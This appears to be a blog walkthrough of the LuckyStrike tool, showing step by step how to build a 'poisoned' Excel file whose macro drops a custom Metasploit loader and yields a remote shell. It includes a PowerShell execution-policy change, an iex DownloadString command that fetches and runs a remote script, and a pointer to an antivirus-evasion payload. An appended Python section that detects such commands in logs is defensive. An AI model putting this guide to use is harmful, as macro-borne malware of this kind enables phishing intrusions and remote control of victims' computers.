LuckyStrike and custom Metasploit loader

Lucky Strike is awesome, so I wanted to share my findings from the experiments I have made.

TL;DR – LuckyStrike is an Excel file generator that will create an Excel file with a custom executable payload embedded as a macro. It has other features as well, but I was only interested in the custom EXE file insertion.

The GitHub repository for LuckyStrike is here: https://github.com/Shellntel/luckystrike

Greetings to curi0usJack

Software I have used:

So first we need to prepare the LuckyStrike environment. In Windows 10 (64-bit) you need to enable this for the PowerShell environment:

(Run Windows PowerShell ISE with admin privileges and set the execution policy; execute it from the directory where you expect to have the LuckyStrike directory.)

Set-ExecutionPolicy RemoteSigned

Next we install LuckyStrike as suggested by the author:

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')

Accept all options and allow the PSSQLite module installation.

We are ready to start LuckyStrike. Go to the directory where your LuckyStrike is and execute the PowerShell script:

./luckystrike.ps1

Next we need to create a payload template to use in our poisoned Excel documents.

Next we add a new payload to the catalogue.

Add the EXE generated via https://astr0baby.wordpress.com/2016/09/23/john-connor-vs-eset-hey-eset-choose-some-other-mascot-not-a-cyborg/

Make sure you type the C: in CAPITAL case; lower case for some reason always failed :)

Select the new payload template to be used for the Excel file and choose the infection method – “Save To Disk”

Now generate the Excel file with the selected custom payload.

The poisoned Excel file is ready in the luckystrike\payloads directory.

Execute it and enjoy the shell ;)

Attached is the video recording of the above
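A defender's view of the setup steps above, as an added example that is not part of the original post or of LuckyStrike: the iex/DownloadString install one-liner and the execution policy change both show up in PowerShell script block logs (Event ID 4104), where they can be flagged. The sample events and rule names are constructed for illustration.

```python
import re

# Constructed records standing in for PowerShell script block logging
# events (Event ID 4104); only the logged script text is modelled.
SAMPLE_EVENTS = [
    {"id": 1, "script": "iex (new-object net.webclient).downloadstring("
                        "'https://raw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')"},
    {"id": 2, "script": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
    {"id": 3, "script": "$c = New-Object System.Net.WebClient\n"
                        "Invoke-Expression $c.DownloadString('http://example.invalid/a.ps1')"},
    {"id": 4, "script": "(New-Object Net.WebClient).DownloadFile("
                        "'https://example.invalid/setup.msi', 'setup.msi')"},
    {"id": 5, "script": "Set-ExecutionPolicy RemoteSigned"},
]

# Hypothetical rule names. The cradle rule needs both halves: something that
# evaluates a string as code and a call that fetches that string remotely.
RULES = {
    "download_cradle": re.compile(
        r"(?=.*\b(?:iex|invoke-expression)\b)(?=.*\.downloadstring\s*\()", re.I | re.S),
    "luckystrike_installer": re.compile(
        r"raw\.githubusercontent\.com/shellntel/luckystrike/", re.I),
    "execution_policy_change": re.compile(r"\bset-executionpolicy\b", re.I),
}

def normalize(script):
    # The backtick is PowerShell's escape character and can sit inside a
    # command name without changing it, so drop it and collapse whitespace.
    return re.sub(r"\s+", " ", script.replace("`", ""))

def triage(events):
    """Return {event id: sorted list of rule names that matched}."""
    findings = {}
    for event in events:
        text = normalize(event["script"])
        hits = sorted(name for name, rule in RULES.items() if rule.search(text))
        if hits:
            findings[event["id"]] = hits
    return findings

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(hits))
```

The plain DownloadFile call (event 4) is not flagged, because it stores a file without evaluating it as code.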
